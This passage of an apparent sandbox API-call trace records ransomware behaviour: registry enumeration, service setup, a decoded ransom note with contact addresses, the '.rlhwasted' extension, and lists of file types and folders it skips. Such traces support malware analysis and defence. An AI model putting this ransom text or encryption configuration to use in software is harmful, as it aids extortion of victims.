Size=0x1a) returned 0x6cb948 [0181.595] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x38, lpName=0x18fd58, cchName=0x104 | out: lpName="SecurityProviders") returned 0x0 [0181.595] lstrlenW (lpString="SecurityProviders") returned 17 [0181.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cb998 [0181.595] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x39, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceGroupOrder") returned 0x0 [0181.595] lstrlenW (lpString="ServiceGroupOrder") returned 17 [0181.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cb9e8 [0181.595] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3a, lpName=0x18fd58, cchName=0x104 | out: lpName="ServiceProvider") returned 0x0 [0181.595] lstrlenW (lpString="ServiceProvider") returned 15 [0181.595] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cba10 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3b, lpName=0x18fd58, cchName=0x104 | out: lpName="Session Manager") returned 0x0 [0181.596] lstrlenW (lpString="Session Manager") returned 15 [0181.596] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cba10 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3c, lpName=0x18fd58, cchName=0x104 | out: lpName="SNMP") returned 0x0 [0181.596] lstrlenW (lpString="SNMP") returned 4 [0181.596] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb418 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3d, lpName=0x18fd58, cchName=0x104 | out: lpName="SQMServiceList") returned 0x0 [0181.596] lstrlenW (lpString="SQMServiceList") returned 14 [0181.596] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6cc0e0 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3e, lpName=0x18fd58, cchName=0x104 | out: lpName="Srp") returned 0x0 [0181.596] lstrlenW (lpString="Srp") returned 3 [0181.596] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb438 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x3f, lpName=0x18fd58, cchName=0x104 | out: lpName="SrpExtensionConfig") returned 0x0 [0181.596] lstrlenW (lpString="SrpExtensionConfig") returned 18 [0181.596] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb458 [0181.596] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x40, lpName=0x18fd58, cchName=0x104 | out: lpName="StillImage") returned 0x0 [0181.597] lstrlenW (lpString="StillImage") returned 10 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb458 [0181.597] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x41, lpName=0x18fd58, cchName=0x104 | out: lpName="Storage") returned 0x0 [0181.597] lstrlenW (lpString="Storage") returned 7 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cba60 [0181.597] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x42, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemResources") returned 0x0 [0181.597] lstrlenW (lpString="SystemResources") returned 15 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cba88 [0181.597] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x43, lpName=0x18fd58, cchName=0x104 | out: lpName="TabletPC") returned 0x0 [0181.597] lstrlenW (lpString="TabletPC") returned 8 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cbab0 [0181.597] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x44, lpName=0x18fd58, cchName=0x104 | out: lpName="Terminal Server") returned 0x0 [0181.597] lstrlenW (lpString="Terminal Server") returned 15 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cbad8 [0181.597] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x45, lpName=0x18fd58, cchName=0x104 | out: lpName="TimeZoneInformation") returned 0x0 [0181.597] lstrlenW (lpString="TimeZoneInformation") returned 19 [0181.597] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb498 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x46, lpName=0x18fd58, cchName=0x104 | out: lpName="usbflags") returned 0x0 [0181.598] lstrlenW (lpString="usbflags") returned 8 [0181.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cbb28 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x47, lpName=0x18fd58, cchName=0x104 | out: lpName="usbstor") returned 0x0 [0181.598] lstrlenW (lpString="usbstor") returned 7 [0181.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cbb50 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x48, lpName=0x18fd58, cchName=0x104 | out: lpName="VAN") returned 0x0 [0181.598] lstrlenW (lpString="VAN") returned 3 [0181.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb4d8 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x49, lpName=0x18fd58, cchName=0x104 | out: lpName="Video") returned 0x0 [0181.598] lstrlenW (lpString="Video") returned 5 [0181.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb4f8 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4a, lpName=0x18fd58, cchName=0x104 | out: lpName="wcncsvc") returned 0x0 [0181.598] lstrlenW (lpString="wcncsvc") returned 7 [0181.598] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cbb78 [0181.598] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4b, lpName=0x18fd58, cchName=0x104 | out: lpName="Wdf") returned 0x0 [0181.599] lstrlenW (lpString="Wdf") returned 3 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb518 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4c, lpName=0x18fd58, cchName=0x104 | out: lpName="WDI") returned 0x0 [0181.599] lstrlenW (lpString="WDI") returned 3 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb538 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4d, lpName=0x18fd58, cchName=0x104 | out: lpName="Windows") returned 0x0 [0181.599] lstrlenW (lpString="Windows") returned 7 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1c) returned 0x6cbba0 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4e, lpName=0x18fd58, cchName=0x104 | out: lpName="Winlogon") returned 0x0 [0181.599] lstrlenW (lpString="Winlogon") returned 8 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cbbc8 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x4f, lpName=0x18fd58, cchName=0x104 | out: lpName="WMI") returned 0x0 [0181.599] lstrlenW (lpString="WMI") returned 3 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb558 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x50, lpName=0x18fd58, cchName=0x104 | out: lpName="hivelist") returned 0x0 [0181.599] lstrlenW (lpString="hivelist") returned 8 [0181.599] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cbbf0 [0181.599] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x51, lpName=0x18fd58, cchName=0x104 | out: lpName="SystemInformation") returned 0x0 [0181.599] lstrlenW (lpString="SystemInformation") returned 17 [0181.600] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1a) returned 0x6cbc18 [0181.600] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x52, lpName=0x18fd58, cchName=0x104 | out: lpName="Winresume") returned 0x0 [0181.600] lstrlenW (lpString="Winresume") returned 9 [0181.600] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6cbc18 [0181.600] RegEnumKeyW (in: hKey=0xa4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0181.600] RegCloseKey (hKey=0xa4) returned 0x0 [0181.600] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\Boot.exe -s" [0181.600] StrChrW (lpStart="C:\\Windows\\SysWOW64\\Boot.exe -s", wMatch=0x20) returned=" -s" [0181.600] StrTrimW (in: psz="-s", pszTrimChars=" " | out: psz="-s") returned 0 [0181.600] GetVersion () returned 0x1db10106 [0181.600] GetCurrentProcess () returned 0xffffffff [0181.600] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff28 | out: TokenHandle=0x18ff28*=0xa4) returned 1 [0181.600] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x14, TokenInformation=0x18ff20, TokenInformationLength=0x4, ReturnLength=0x18ff2c | out: TokenInformation=0x18ff20, ReturnLength=0x18ff2c) returned 1 [0181.600] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff2c | out: TokenInformation=0x0, ReturnLength=0x18ff2c) returned 0 [0181.600] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x14) returned 0x6cb578 [0181.600] GetTokenInformation (in: TokenHandle=0xa4, TokenInformationClass=0x19, TokenInformation=0x6cb578, TokenInformationLength=0x14, ReturnLength=0x18ff2c | out: TokenInformation=0x6cb578, ReturnLength=0x18ff2c) returned 1 [0181.600] GetSidSubAuthorityCount (pSid=0x6cb580*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 0x6cb581 [0181.600] GetSidSubAuthority (pSid=0x6cb580*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000), nSubAuthority=0x0) returned 0x6cb588 [0181.600] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb578 | out: hHeap=0x6b0000) returned 1 [0181.601] CloseHandle (hObject=0xa4) returned 1 [0181.601] lstrlenW (lpString="-s") returned 2 [0181.601] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x6) returned 0x6cc110 [0181.601] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6cc120 [0181.601] lstrlenW (lpString="-s") returned 2 [0181.601] StartServiceCtrlDispatcherW (lpServiceTable=0x18ff3c*(lpServiceName="Boot", lpServiceProc=0x4034bf)) [0181.957] SetEvent (hEvent=0xe4) returned 1 Thread: id = 335 os_tid = 0x6a8 Thread: id = 336 os_tid = 0x6d8 Thread: id = 337 os_tid = 0x4e0 [0181.618] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xe4 [0181.618] RegisterServiceCtrlHandlerW (lpServiceName="Boot", lpHandlerProc=0x405505) returned 0x6cd500 [0181.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x405e2a, lpParameter=0x40a5d4, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe8 [0181.619] SetServiceStatus (hServiceStatus=0x6cd500, lpServiceStatus=0x102ff4c*(dwServiceType=0x30, dwCurrentState=0x4, dwControlsAccepted=0x5, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0181.622] WaitForMultipleObjects (nCount=0x2, lpHandles=0x102ff68*=0xe4, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 338 os_tid = 0x5bc [0181.619] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb778 [0181.620] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6cd578 [0181.620] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x36) returned 0x6ccbe8 [0181.622] _wcslwr (in: _String=0x6ccbe8 | out: _String="movable|fixed|remote|share") returned="movable|fixed|remote|share" [0181.622] StrChrW (lpStart="movable|fixed|remote|share", wMatch=0x7c) returned="|fixed|remote|share" [0181.622] StrChrW (lpStart="fixed|remote|share", wMatch=0x7c) returned="|remote|share" [0181.622] StrChrW (lpStart="remote|share", wMatch=0x7c) returned="|share" [0181.622] StrChrW (lpStart="share", wMatch=0x7c) returned 0x0 [0181.623] lstrlenW (lpString="share") returned 5 [0181.623] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ccbe8 | out: hHeap=0x6b0000) returned 1 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6cd1e0 [0181.623] StrToIntExW (in: pszString="128", dwFlags=0x0, piRet=0x112ff5c | out: piRet=0x112ff5c) returned 1 [0181.623] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cd1e0 | out: hHeap=0x6b0000) returned 1 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x6) returned 0x6cd1e0 [0181.623] StrToIntExW (in: pszString="20", dwFlags=0x0, piRet=0x112ff60 | out: piRet=0x112ff60) returned 1 [0181.623] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cd1e0 | out: hHeap=0x6b0000) returned 1 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x406) returned 0x6d40e0 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x117) returned 0x6d44f0 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c) returned 0x6ccbe8 [0181.623] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6d44f0, cbMultiByte=279, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 279 [0181.623] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x230) returned 0x6d4610 [0181.623] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6d44f0, cbMultiByte=279, lpWideCharStr=0x6d4610, cchWideChar=279 | out: lpWideCharStr="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 279 [0181.623] lstrlenW (lpString="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n") returned 277 [0181.623] StrChrW (lpStart="[begin_key]*[end_key]", wMatch=0x2a) returned="*[end_key]" [0181.623] StrStrW (lpFirst="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]*[end_key]\r\nKEEP IT\r\n", lpSrch="[begin_key]*[end_key]") returned="[begin_key]*[end_key]\r\nKEEP IT\r\n" [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x230) returned 0x6d4848 [0181.649] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4610 | out: hHeap=0x6b0000) returned 1 [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x4) returned 0x6cd1e0 [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x8) returned 0x6d4a98 [0181.649] StrToIntExW (in: pszString="300", dwFlags=0x0, piRet=0x112ff64 | out: piRet=0x112ff64) returned 1 [0181.649] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4a98 | out: hHeap=0x6b0000) returned 1 [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cd5a0 [0181.649] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x18 [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x30) returned 0x6d4e80 [0181.649] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\lck.log", lpDst=0x6d4e80, nSize=0x18 | out: lpDst="C:\\Windows\\TEMP\\lck.log") returned 0x18 [0181.649] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cd5a0 | out: hHeap=0x6b0000) returned 1 [0181.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x284) returned 0x6d4eb8 [0181.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xb8) returned 0x6d4610 [0181.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x150) returned 0x6d46d0 [0181.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xe) returned 0x6ccdd8 [0181.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x6) returned 0x6d4a98 [0181.650] StrToIntExW (in: pszString="50", dwFlags=0x0, piRet=0x112fec0 | out: piRet=0x112fec0) returned 1 [0181.650] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4a98 | out: hHeap=0x6b0000) returned 1 [0181.650] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x6) returned 0x6d4a98 [0181.650] StrToIntExW (in: pszString="32", dwFlags=0x0, piRet=0x112ff38 | out: piRet=0x112ff38) returned 1 [0181.650] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4a98 | out: hHeap=0x6b0000) returned 1 [0181.651] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x112fe8c | out: ppstm=0x112fe8c*=0x6cd5a0) returned 0x0 [0181.652] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.652] lstrlenW (lpString=".rlhwasted_info") returned 15 [0181.652] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cd578*=0x2e, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.652] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.652] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.652] lstrlenW (lpString=".rlhwasted") returned 10 [0181.652] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cb778*=0x2e, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] lstrlenW (lpString="*\\NTLDR|*\\BOOTMGR|*\\GRLDR|*.386|*.ps1|*.msu|*.ani|*.wpx|*.hlp|*.ocx|*.com|*.cpl|*.adv|*.cmd|*.lnk|*.drv|*.sys|*.icl|*.nls|*.cab|*.bat|*.theme|*.bin|*.key|*.themepack|*.msi|*.icns|*.ics|*.idx|*.hta|*.scr|*.msstyles|*.diagcfg|*.diagcab|*.nomedia|*.msc|*.cur|*.mod|*.shs|*.rtp|*.rom|*.msp|*.ini|*.dat|*.sdi|*.wim|*.dll|*.exe") returned 321 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6d4eb8*=0x2a, cb=0x282, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] StrChrW (lpStart="%ProgramData%|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xf [0181.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x1e) returned 0x6cd618 [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%", lpDst=0x6cd618, nSize=0xf | out: lpDst="C:\\ProgramData") returned 0xf [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cd618*=0x43, cb=0x1c, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cd618 | out: hHeap=0x6b0000) returned 1 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] StrChrW (lpStart="%windir%|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xb [0181.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x16) returned 0x6cb798 [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%windir%", lpDst=0x6cb798, nSize=0xb | out: lpDst="C:\\Windows") returned 0xb [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cb798*=0x43, cb=0x14, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb798 | out: hHeap=0x6b0000) returned 1 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] StrChrW (lpStart="%temp%|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x10 [0181.653] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x20) returned 0x6cd618 [0181.653] ExpandEnvironmentStringsW (in: lpSrc="%temp%", lpDst=0x6cd618, nSize=0x10 | out: lpDst="C:\\Windows\\TEMP") returned 0x10 [0181.653] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cd618*=0x43, cb=0x1e, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.653] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cd618 | out: hHeap=0x6b0000) returned 1 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] StrChrW (lpStart="%AppData%|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)" [0181.654] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x39 [0181.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x72) returned 0x6bf080 [0181.654] ExpandEnvironmentStringsW (in: lpSrc="%AppData%", lpDst=0x6bf080, nSize=0x39 | out: lpDst="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x39 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6bf080*=0x43, cb=0x70, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6bf080 | out: hHeap=0x6b0000) returned 1 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] StrChrW (lpStart="C:\\Recovery|C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files|C:\\Program Files (x86)" [0181.654] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0xc [0181.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x18) returned 0x6cb798 [0181.654] ExpandEnvironmentStringsW (in: lpSrc="C:\\Recovery", lpDst=0x6cb798, nSize=0xc | out: lpDst="C:\\Recovery") returned 0xc [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x6cb798*=0x43, cb=0x16, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6cb798 | out: hHeap=0x6b0000) returned 1 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x5c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x2a, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] ISequentialStream:RemoteWrite (in: This=0x6cd5a0, pv=0x112fe28*=0x7c, cb=0x2, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0181.654] StrChrW (lpStart="C:\\Program Files|C:\\Program Files (x86)", wMatch=0x7c) returned="|C:\\Program Files (x86)" [0181.654] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x11 [0181.654] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x22) returned 0x6d5530 [0181.654] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files", lpDst=0x6d5530, 